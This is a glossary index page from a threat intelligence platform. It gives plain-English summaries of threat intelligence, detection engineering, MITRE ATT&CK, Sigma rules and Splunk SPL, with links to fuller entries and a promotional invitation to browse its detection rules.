// glossary

Threat Intelligence & Detection Engineering Glossary

Plain-English explanations of the core concepts behind the Threadlinqs platform — what each term means, why it matters, and how it fits into modern security operations.

What is Threat Intelligence?

The definition and types of cyber threat intelligence (strategic, tactical, operational), the intelligence cycle, the difference between IOCs and TTPs, and how threat intel reduces MTTD/MTTR in the SOC.

read →

What is Detection Engineering?

How detection engineering turns threat intelligence into testable, version-controlled detection logic — the detection lifecycle, rule quality, and measuring coverage against adversary behavior.

read →

What is MITRE ATT&CK?

The MITRE ATT&CK framework explained — tactics, techniques, and procedures (TTPs), how the matrix is structured, and how teams use it to map coverage and find detection gaps.

read →

What are Sigma Rules?

The vendor-agnostic detection rule format — how Sigma works, why it is portable across SIEMs, and how it converts to Splunk SPL, Microsoft KQL, and other backends.

read →

What is Splunk SPL?

Splunk's Search Processing Language explained — core commands, how SPL queries detect threats in log data, and how it compares to other SIEM query languages.

read →

See These Concepts in Action

Browse real threats with production detection rules in SPL, KQL, and Sigma — mapped to MITRE ATT&CK. Free on the Blue tier.

[ open_platform ]